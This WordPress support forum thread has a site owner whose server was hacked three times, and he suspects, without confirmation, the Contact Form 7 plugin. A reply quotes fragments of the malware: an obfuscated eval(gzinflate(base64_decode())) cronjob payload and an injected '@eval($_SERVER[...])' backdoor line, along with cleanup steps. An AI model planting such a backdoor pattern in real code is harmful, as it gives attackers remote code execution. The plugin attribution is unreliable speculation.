Hacked three times

  • While I don’t know for sure that security issues with Contact Form 7 are the cause of my server virus problems, I strongly suspect it. My site has been hacked three times with PHP viruses that typically enter through user input forms. In all three cases they ended up with root access to my server. Twice they were sending spam emails, and the third time I think some Chinese people were using my server for bitcoin mining. It’s hard to know for sure how they hacked my site but I have a static site, basically a fancy business card. The only obvious opportunity for user input and potential hacking is the Contact Form 7 email form. I looked through the plugin’s validation code, and while it does a good job at validating the various types of user input it doesn’t seem to do anything at all to anticipate or prevent malicious PHP injection hacks. My themes and plugins were not hacked, those were untouched, so it appears they went through the Contact Form 7 fields and gained access to the server that way.

Viewing 3 replies - 1 through 3 (of 3 total)

  • Use the Patchstack plugin to scan for vulnerable plugins or just search the Patchstack vulnerability database by hand (though that will not protect you from future problems unless you do that daily).

    • This reply was modified 7 months, 1 week ago by patrick1994.
    jeroenvip

    (@hieronymusdesign)

    We also had some issues with this. It turns out this hack was pretty nasty. It installed a cronjob under the user www-data. The cronjob runs once every minute executing the code 

    eval(gzinflate(base64_decode(......."

    This was adding the following code in query.php at line 539

    "@eval($_SERVER['HTTP_XXXX']"

    To fix this remove the cronjob running under the www-data user.

    sudo crontab -e -u www-data
    Thread Starter JeremyBorum

    (@jeremyborum)

    @jeroenvip: One of the hacks I had to clean out of my site used all of those techniques also. It kept rewriting all the corrupted files and it took me quite a while to find the culprit because it was at the user root level, not the public_html level. Every folder had a new .htaccess file and other junk files were scattered everywhere, so it was hard to tell what files were genuinely doing something.

    There was a huge amount of data transfer over just a few days, several terabytes, and the up/down numbers were quite similar in size. I did my best to de-obfuscate the code, and my best guess is that it was using my web server for bitcoin mining. It was requesting a file, doing something, and sending a result, so one way or another it was processing something.

Viewing 3 replies - 1 through 3 (of 3 total)
  • The topic ‘Hacked three times’ is closed to new replies.